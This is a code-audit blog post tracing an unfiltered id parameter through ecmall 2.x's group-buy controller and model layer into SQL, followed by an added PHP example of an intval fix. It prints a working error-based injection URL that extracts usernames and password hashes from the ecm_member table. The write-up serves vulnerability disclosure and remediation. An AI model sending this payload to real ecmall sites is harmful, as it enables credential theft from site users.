Code audit: analysis and exploitation of an ecmall 2.x universal SQL injection vulnerability

Category: Seay Information Security Blog


Vulnerable file: app/buyer_groupbuy.app.php


```php
function exit_group()
{
    $id = empty($_GET['id']) ? 0 : $_GET['id']; // not filtered, you know what that means
    if (!$id)
    {
        $this->show_warning('no_such_groupbuy');
        return false;
    }

    // check whether the user is allowed to leave the group buy
    if (!$this->_ican($id, ACT)) // follow this
    {
        $this->show_warning('Hacking Attempt');
        return;
    }
    // ......
}

function _ican($id, $act = '')
{
    // ......
    $group = current($this->_member_mod->getRelatedData('join_groupbuy', $this->visitor->info['user_id'], array(
        'conditions' => 'gb.group_id=' . $id, // carried into the query unescaped
        'order'      => 'gb.group_id DESC',
        'fields'     => 'gb.state,groupbuy_log.order_id'
    )));
    // ......
}
```
  
eccore/model/mode.base.php 

```php
function getRelatedData($relation_name, $ids, $find_param = array())
{
    // ......
    /* build the query conditions */
    $conditions = $alias . '.' . $relation_info['foreign_key'] . ' ' . db_create_in($ids); // restrict by primary key values
    $conditions .= $relation_info['ext_limit'] ?
                        ' AND ' . $this->_getExtLimit($relation_info['ext_limit'], $alias)
                        : '';
    $conditions .= is_string($find_param['conditions']) ? ' AND ' . $find_param['conditions'] : '';
    $find_param['conditions'] = $conditions; // carried through
    // ......
    return $model->find($find_param); // follow this
}

function find($params = array())
{
    extract($this->_initFindParams($params));

    /* fields (SELECT FROM) */
    $fields = $this->getRealFields($fields);
    $fields == '' && $fields = '*';

    $tables = $this->table . ' ' . $this->alias;

    /* left join (LEFT JOIN) */
    $join_result = $this->_joinModel($tables, $join);

    /* Originally ($join_result || $index_key); the original intent is forgotten. Appending the primary key by default probably only serves building an indexed array, so it should depend only on whether the index key is the primary key */
    if ($index_key == $this->prikey || (is_array($index_key) && in_array($this->prikey, $index_key)))
    {
        /* if the index key contains the primary key, append the primary key to the selected fields by default */
        $fields .= ",{$this->alias}.{$this->prikey}";
    }

    /* conditions (WHERE) */
    $conditions = $this->_getConditions($conditions, true);

    /* sorting (ORDER BY) */
    $order && $order = ' ORDER BY ' . $this->getRealFields($order);

    /* paging (LIMIT) */
    $limit && $limit = ' LIMIT ' . $limit;
    if ($count)
    {
        $this->_updateLastQueryCount("SELECT COUNT(*) as c FROM {$tables}{$conditions}");
    }

    /* the complete SQL */
    $sql = "SELECT {$fields} FROM {$tables}{$conditions}{$order}{$limit}";

    return $index_key ? $this->db->getAllWithIndex($sql, $index_key) :
                        $this->db->getAll($sql);
    // carried into the query; end.
}
```

 

Exploit: http://localhost/ecmall/index.php?app=buyer_groupbuy&act=exit_group&id=1 union select 1 from (select count(*),concat(floor(rand(0)*2),(select concat(user_name,password) from ecm_member limit 0,1))a from information_schema.tables group by a)b
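As an added example (not ecmall's own code), the unescaped `$id` concatenation from `exit_group()`/`_ican()` is shown beside a hardened version that coerces the id to a positive integer before it reaches `getRelatedData()`; the function names, the mock request array, the key restriction and the sample value are all constructed here.

```php
<?php
// Added example, not ecmall code: vulnerable id handling next to the fix.

// Mirrors the original controller: $id is concatenated into the WHERE clause unchanged.
function build_ican_condition_vulnerable(array $get): string
{
    $id = empty($get['id']) ? 0 : $get['id'];
    return 'gb.group_id=' . $id;
}

// Hardened: coerce to a positive integer before the value reaches the model layer.
// Anything that is not a plain group id collapses to its leading digits or to 0,
// and 0 is rejected so the caller can show_warning('no_such_groupbuy') and stop.
function build_ican_condition_hardened(array $get): ?string
{
    $id = empty($get['id']) ? 0 : intval($get['id']);
    if ($id <= 0) {
        return null;
    }
    return 'gb.group_id=' . $id;
}

// Mirrors getRelatedData(): the caller's condition is ANDed onto the key restriction.
function compose_where(string $key_limit, ?string $extra): string
{
    return ' WHERE ' . $key_limit . ($extra !== null ? ' AND ' . $extra : '');
}

// Constructed sample request and key restriction (hypothetical user id 42).
$request   = ['id' => '1 union select 1 from (select 1)b'];
$key_limit = 'gb.user_id IN (42)';

// Vulnerable path: the whole attacker-controlled string lands in the SQL.
echo compose_where($key_limit, build_ican_condition_vulnerable($request)), PHP_EOL;

// Hardened path: only the integer 1 survives, so the query stays "gb.group_id=1".
$safe = build_ican_condition_hardened($request);
echo $safe === null ? 'rejected: no_such_groupbuy' : compose_where($key_limit, $safe), PHP_EOL;
```

The same coercion applies to any other controller that builds a `conditions` string for `getRelatedData()`, since the model layer never escapes that parameter.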

 

Author: Chora

Tags: ecmall vulnerability, code audit
